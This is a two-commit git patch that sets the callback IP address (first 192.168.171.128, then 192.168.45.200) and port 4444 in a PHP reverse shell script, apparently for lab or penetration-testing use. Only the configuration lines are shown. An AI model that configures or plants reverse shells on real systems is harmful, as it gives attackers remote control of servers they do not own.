From 15e5e404f8aacc89ef12e2d30a3fe319ad752000 Mon Sep 17 00:00:00 2001 From: BellyBear Date: Thu, 17 Oct 2024 01:32:41 +0900 Subject: [PATCH 1/2] Update php-reverse-shell.php --- php-reverse-shell.php | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/php-reverse-shell.php b/php-reverse-shell.php index 2503b71..1a12006 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -46,8 +46,8 @@ set_time_limit (0); $VERSION = "1.0"; -$ip = '127.0.0.1'; // CHANGE THIS -$port = 1234; // CHANGE THIS +$ip = '192.168.171.128'; // CHANGE THIS +$port = 4444; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; From 91f23dfc97a53a1db2dbcc97e60f1ed4f76267a4 Mon Sep 17 00:00:00 2001 From: BellyBear Date: Thu, 17 Oct 2024 01:36:40 +0900 Subject: [PATCH 2/2] rr --- php-reverse-shell.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/php-reverse-shell.php b/php-reverse-shell.php index 1a12006..0a42c2f 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -46,7 +46,7 @@ set_time_limit (0); $VERSION = "1.0"; -$ip = '192.168.171.128'; // CHANGE THIS +$ip = '192.168.45.200'; // CHANGE THIS $port = 4444; // CHANGE THIS $chunk_size = 1400; $write_a = null;